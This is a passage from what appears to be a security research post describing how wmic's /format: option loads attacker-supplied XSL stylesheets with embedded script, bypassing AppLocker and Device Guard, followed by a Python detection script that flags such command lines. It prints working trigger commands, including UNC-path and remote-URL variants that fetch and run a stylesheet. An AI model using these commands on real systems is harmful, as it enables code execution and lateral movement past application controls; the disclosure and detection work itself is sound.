A bit of looking at ProcMon and we confirmed that this indeed was how that file was loaded.

I decided to change the /format: parameter to see if I could influence the search and possibly get it to load my own file.

subtee [8:16 AM]

look at it searching for xsl with this.

C:\>wmic process LIST /FORMAT:wtf.xsl

So, NOW we have something interesting. We have wmic searching for a user supplied stylesheet.

Who cares about stylesheets? Well, there are some really interesting tags that allow you to embed JScript or VBScript. If wmic executes those, it will likely do so even in a constrained environment, such as under AppLocker or where Windows Script Host has been disabled.

After some validation by both Matt Graeber and Matt Nelson (@enigma0x3), it was confirmed that we had an unconstrained script host bypass for Windows Defender Application Control (aka Device Guard).

The importance of this is that this primitive leads to arbitrary binary execution, thanks to the work and techniques developed by James Forshaw (@tiraniddo).

But we are just getting started! It gets way better.

What we have so far is this:

`wmic os get /format:"MYXSLFILE.xsl"` to trigger execution.

subtee [9:15 AM]

Who would have thought wmic processes xslt lol, I can't stop laughing

subtee [9:50 AM]

This can probably be used for some lateral movement, exec wmic on the target and have it reach back and pull the xsl file like this `wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"`

You can even drop the xsl and it resolves `wmic process get brief /format:"\\127.0.0.1\c$\Tools\csv"`

to try to blend in

... this works too

`wmic process get brief /format:"https://www.example.com/file.xsl"`

So here we have it: another tool, like regsvr32.exe, that can accept a script path or URL and execute it.
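From the defender's side, the /format: variants above (a bare filename, a UNC path with or without the .xsl extension, and an HTTPS URL) are all visible in the process command line. The following triage script is an added example, not code from the original post; the built-in format name list is an assumption and the sample command lines are constructed to mirror the ones quoted in the post:

```python
import re

# Assumption: a short list of wmic's documented built-in format names.
BUILTIN_FORMATS = {"csv", "hform", "htable", "list", "mof", "rawxml",
                   "table", "texttablewsys", "value", "xml"}
# wmic ... /FORMAT:<value>; the value may be wrapped in straight quotes or bare.
FORMAT_RE = re.compile(r'wmic\b.*?/format:\s*(?:"([^"]*)"|(\S+))', re.IGNORECASE)
SEVERITY = {"url": "high", "unc": "high", "local_path": "medium",
            "local_file": "medium", "unknown_name": "medium", "builtin": "info"}

def classify_format_value(value: str) -> str:
    """Say where wmic would look for the stylesheet named in /format:."""
    low = value.strip().strip('"').lower()
    if re.match(r"^(https?|ftp)://", low):
        return "url"          # stylesheet fetched from a web server
    if low.startswith("\\\\"):
        return "unc"          # UNC share, incl. the \\127.0.0.1\c$ loopback form
    if "\\" in low or "/" in low:
        return "local_path"   # explicit path (e.g. C:\...) to a user-supplied file
    if low.endswith(".xsl"):
        return "local_file"   # bare filename left to wmic's search order
    if low in BUILTIN_FORMATS:
        return "builtin"      # normal usage, e.g. /format:csv
    return "unknown_name"     # bare name that wmic will resolve to <name>.xsl

def triage_wmic(cmdline: str):
    """(severity, category, value) for a wmic line carrying /format:, else None."""
    m = FORMAT_RE.search(cmdline)
    if not m:
        return None
    value = m.group(1) if m.group(1) is not None else m.group(2)
    cat = classify_format_value(value)
    return SEVERITY[cat], cat, value

# Constructed command lines modelled on the post; not real telemetry.
SAMPLE_CMDLINES = [
    r'wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"',
    r'wmic process get brief /format:"\\127.0.0.1\c$\Tools\csv"',
    r'wmic process get brief /format:"https://www.example.com/file.xsl"',
    r"wmic process LIST /FORMAT:wtf.xsl",
    r"wmic os get /format:csv",
    r"wmic os get caption",
]

def scan(cmdlines):  # (severity, category, cmdline) for everything above 'info'
    results = [(triage_wmic(c), c) for c in cmdlines]
    return [(r[0], r[1], c) for r, c in results if r and r[0] != "info"]
```

Feed `scan()` the command-line field of your process-creation events (Sysmon Event ID 1 or Security 4688 with command-line auditing) and the four non-built-in samples above are the ones that come back.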